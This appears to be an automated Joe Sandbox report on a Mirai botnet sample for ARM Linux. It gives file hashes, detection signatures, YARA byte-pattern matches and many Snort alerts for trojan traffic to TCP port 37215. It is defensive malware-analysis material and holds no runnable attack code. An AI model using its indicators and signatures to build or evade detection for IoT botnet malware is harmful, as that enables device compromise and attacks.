Loading Joe Sandbox Report ...

Edit tour

Linux Analysis Report
bVMuPnsMIq.elf

Overview

General Information

Sample name:bVMuPnsMIq.elf
renamed because original name is a hash value
Original sample name:5b8f209d14debe9f2be00e6dfcb52b8b.elf
Analysis ID:1454244
MD5:5b8f209d14debe9f2be00e6dfcb52b8b
SHA1:2971ff432439f15f251774db6e3baa9eb297443f
SHA256:0ca2c1fcd276b87173c8c6e702fc8f5f613468b9e6174e5a7c8d5df2130bf195
Tags:32armelfmirai
Infos:

Detection

Mirai
Score:92
Range:0 - 100
Whitelisted:false

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected Mirai
Connects to many ports of the same IP (likely port scanning)
Sample is packed with UPX
Uses known network protocols on non-standard ports
Detected TCP or UDP traffic on non-standard ports
ELF contains segments with high entropy indicating compressed/encrypted content
HTTP GET or POST without a user agent
Sample contains only a LOAD segment without any section mappings
Sample listens on a socket
Uses the "uname" system call to query kernel version information (possible evasion)
Yara signature match

Classification

Joe Sandbox version:40.0.0 Tourmaline
Analysis ID:1454244
Start date and time:2024-06-09 16:31:56 +02:00
Joe Sandbox product:CloudBasic
Overall analysis duration:0h 6m 4s
Hypervisor based Inspection enabled:false
Report type:full
Cookbook file name:defaultlinuxfilecookbook.jbs
Analysis system description:Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Analysis Mode:default
Sample name:bVMuPnsMIq.elf
renamed because original name is a hash value
Original Sample Name:5b8f209d14debe9f2be00e6dfcb52b8b.elf
Detection:MAL
Classification:mal92.troj.evad.linELF@0/0@41/0
  • Report size exceeded maximum capacity and may have missing behavior information.
  • Report size exceeded maximum capacity and may have missing network information.
Command:/tmp/bVMuPnsMIq.elf
PID:5644
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Hello, world!
Standard Error:
  • system is lnxubuntu20
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
MiraiMirai is one of the first significant botnets targeting exposed networking devices running Linux. Found in August 2016 by MalwareMustDie, its name means "future" in Japanese. Nowadays it targets a wide range of networked embedded devices such as IP cameras, home routers (many vendors involved), and other IoT devices. Since the source code was published on "Hack Forums" many variants of the Mirai family appeared, infecting mostly home networks all around the world.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/elf.mirai
SourceRuleDescriptionAuthorStrings
5652.1.00007fec04017000.00007fec04036000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
    5652.1.00007fec04017000.00007fec04036000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
      5652.1.00007fec04017000.00007fec04036000.r-x.sdmpLinux_Trojan_Gafgyt_28a2fe0cunknownunknown
      • 0x1c06c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c080:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c094:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c0a8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c0bc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c0d0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c0e4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c0f8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c10c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c120:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c134:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c148:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c15c:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c170:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c184:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c198:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c1ac:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c1c0:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c1d4:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c1e8:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      • 0x1c1fc:$a: 2F 78 33 38 2F 78 46 4A 2F 78 39 33 2F 78 49 44 2F 78 39 41 2F 78 33 38 2F 78 46 4A 2F
      5644.1.00007fec04017000.00007fec04036000.r-x.sdmpJoeSecurity_Mirai_6Yara detected MiraiJoe Security
        5644.1.00007fec04017000.00007fec04036000.r-x.sdmpJoeSecurity_Mirai_8Yara detected MiraiJoe Security
          Click to see the 7 entries
          Timestamp:06/09/24-16:33:23.478867
          SID:2835222
          Source Port:40494
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.277258
          SID:2829579
          Source Port:37628
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.471166
          SID:2829579
          Source Port:55374
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286770
          SID:2835222
          Source Port:41552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.952069
          SID:2835222
          Source Port:45730
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.985250
          SID:2829579
          Source Port:40870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.687491
          SID:2829579
          Source Port:50472
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.249510
          SID:2829579
          Source Port:56046
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.286582
          SID:2829579
          Source Port:55820
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.660693
          SID:2829579
          Source Port:35636
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417489
          SID:2835222
          Source Port:54354
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.637997
          SID:2829579
          Source Port:60486
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643294
          SID:2829579
          Source Port:37552
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.030589
          SID:2829579
          Source Port:51834
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.643370
          SID:2829579
          Source Port:59904
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.660322
          SID:2835222
          Source Port:39970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.274517
          SID:2835222
          Source Port:59612
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.245470
          SID:2829579
          Source Port:57846
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.168907
          SID:2829579
          Source Port:38196
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.119890
          SID:2835222
          Source Port:44224
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.952075
          SID:2835222
          Source Port:48514
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.865850
          SID:2829579
          Source Port:40502
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.642767
          SID:2835222
          Source Port:43014
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.479009
          SID:2829579
          Source Port:48806
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.131888
          SID:2835222
          Source Port:37082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987991
          SID:2829579
          Source Port:36544
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.566417
          SID:2835222
          Source Port:58152
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.000694
          SID:2829579
          Source Port:55322
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164520
          SID:2835222
          Source Port:56144
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.036641
          SID:2835222
          Source Port:60222
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867867
          SID:2835222
          Source Port:50160
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.127274
          SID:2835222
          Source Port:60872
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.104441
          SID:2835222
          Source Port:37848
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287295
          SID:2829579
          Source Port:60178
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862685
          SID:2835222
          Source Port:34682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987936
          SID:2835222
          Source Port:40800
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.604245
          SID:2829579
          Source Port:51268
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398431
          SID:2829579
          Source Port:49132
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.087215
          SID:2835222
          Source Port:39186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.028214
          SID:2829579
          Source Port:39576
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413555
          SID:2835222
          Source Port:52018
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253314
          SID:2835222
          Source Port:48886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.908862
          SID:2835222
          Source Port:37682
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223989
          SID:2835222
          Source Port:34058
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.290577
          SID:2835222
          Source Port:53668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.245546
          SID:2829579
          Source Port:44488
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.010651
          SID:2829579
          Source Port:37186
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.225711
          SID:2835222
          Source Port:41558
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.165999
          SID:2829579
          Source Port:36624
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.206206
          SID:2835222
          Source Port:57386
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.951122
          SID:2835222
          Source Port:36470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.644667
          SID:2835222
          Source Port:49970
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.287551
          SID:2829579
          Source Port:59664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.949956
          SID:2829579
          Source Port:42500
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987868
          SID:2835222
          Source Port:36644
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.081140
          SID:2835222
          Source Port:57626
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862654
          SID:2829579
          Source Port:45546
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.472502
          SID:2829579
          Source Port:37844
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.288962
          SID:2829579
          Source Port:34736
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253289
          SID:2835222
          Source Port:38616
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538743
          SID:2829579
          Source Port:42560
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.471525
          SID:2829579
          Source Port:56048
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:27.000538
          SID:2835222
          Source Port:47934
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.273573
          SID:2835222
          Source Port:51420
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.291638
          SID:2835222
          Source Port:43216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.720241
          SID:2835222
          Source Port:44434
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:19.644503
          SID:2835222
          Source Port:35980
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.306359
          SID:2835222
          Source Port:35012
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.296748
          SID:2829579
          Source Port:48630
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.253035
          SID:2829579
          Source Port:59642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:23.465312
          SID:2835222
          Source Port:38794
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.121451
          SID:2835222
          Source Port:48100
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.890509
          SID:2829579
          Source Port:54150
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.993635
          SID:2829579
          Source Port:44216
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862759
          SID:2835222
          Source Port:59690
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.901966
          SID:2835222
          Source Port:36082
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034988
          SID:2829579
          Source Port:50696
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.949694
          SID:2829579
          Source Port:41402
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538058
          SID:2835222
          Source Port:36572
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.268440
          SID:2829579
          Source Port:54444
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820031
          SID:2835222
          Source Port:57052
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.692079
          SID:2829579
          Source Port:47470
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.987451
          SID:2829579
          Source Port:33774
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.305061
          SID:2835222
          Source Port:60852
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538203
          SID:2835222
          Source Port:57606
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.223062
          SID:2829579
          Source Port:41694
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.288720
          SID:2835222
          Source Port:53344
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.928323
          SID:2835222
          Source Port:59090
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.676264
          SID:2835222
          Source Port:36206
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929755
          SID:2829579
          Source Port:60168
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.284665
          SID:2829579
          Source Port:58536
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:29.289444
          SID:2835222
          Source Port:53830
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.818297
          SID:2835222
          Source Port:43188
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.300743
          SID:2835222
          Source Port:49640
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.251341
          SID:2829579
          Source Port:43452
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.102540
          SID:2835222
          Source Port:57668
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:16.929054
          SID:2835222
          Source Port:60940
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.823282
          SID:2829579
          Source Port:58540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.822672
          SID:2835222
          Source Port:45192
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.417944
          SID:2829579
          Source Port:49922
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.537867
          SID:2829579
          Source Port:33346
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.863232
          SID:2835222
          Source Port:51094
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.866214
          SID:2829579
          Source Port:50230
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.034219
          SID:2829579
          Source Port:41870
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.986479
          SID:2829579
          Source Port:60260
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.302185
          SID:2835222
          Source Port:48050
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.714366
          SID:2829579
          Source Port:58378
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.920063
          SID:2829579
          Source Port:54508
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.905994
          SID:2835222
          Source Port:39116
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.568002
          SID:2835222
          Source Port:54542
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.687647
          SID:2835222
          Source Port:53246
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.278939
          SID:2829579
          Source Port:55642
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.946681
          SID:2835222
          Source Port:56254
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.596380
          SID:2835222
          Source Port:46252
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.205706
          SID:2835222
          Source Port:37008
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.099675
          SID:2835222
          Source Port:38672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.101062
          SID:2829579
          Source Port:55356
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.157395
          SID:2835222
          Source Port:56664
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.078874
          SID:2829579
          Source Port:58338
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.719928
          SID:2835222
          Source Port:56964
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.398866
          SID:2835222
          Source Port:38468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.132013
          SID:2829579
          Source Port:46886
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718301
          SID:2835222
          Source Port:37752
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.904495
          SID:2835222
          Source Port:44990
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.158122
          SID:2829579
          Source Port:54892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:38.294502
          SID:2835222
          Source Port:60894
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.538617
          SID:2835222
          Source Port:58610
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.862601
          SID:2835222
          Source Port:58228
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:46.418249
          SID:2835222
          Source Port:57372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:24.718338
          SID:2829579
          Source Port:57710
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.717935
          SID:2829579
          Source Port:58758
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.037033
          SID:2829579
          Source Port:42524
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:28.164798
          SID:2829579
          Source Port:49956
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:13.721481
          SID:2835222
          Source Port:55944
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:26.990259
          SID:2835222
          Source Port:50332
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.414214
          SID:2835222
          Source Port:49540
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.281038
          SID:2835222
          Source Port:37892
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:22.103319
          SID:2829579
          Source Port:47966
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:18.399175
          SID:2829579
          Source Port:40380
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:30.413235
          SID:2835222
          Source Port:53388
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:44.248885
          SID:2835222
          Source Port:60916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:42.074994
          SID:2829579
          Source Port:48156
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:39.567634
          SID:2829579
          Source Port:40792
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.600338
          SID:2835222
          Source Port:44096
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.908837
          SID:2829579
          Source Port:40672
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:40.820626
          SID:2829579
          Source Port:46292
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:15.541608
          SID:2829579
          Source Port:39110
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:21.944621
          SID:2829579
          Source Port:41916
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.635124
          SID:2835222
          Source Port:42648
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:32.599377
          SID:2829579
          Source Port:35412
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:36.031957
          SID:2829579
          Source Port:53468
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:37.161986
          SID:2835222
          Source Port:52372
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:34.867264
          SID:2835222
          Source Port:37172
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:06/09/24-16:33:11.035278
          SID:2829579
          Source Port:48288
          Destination Port:37215
          Protocol:TCP
          Classtype:A Network Trojan was detected
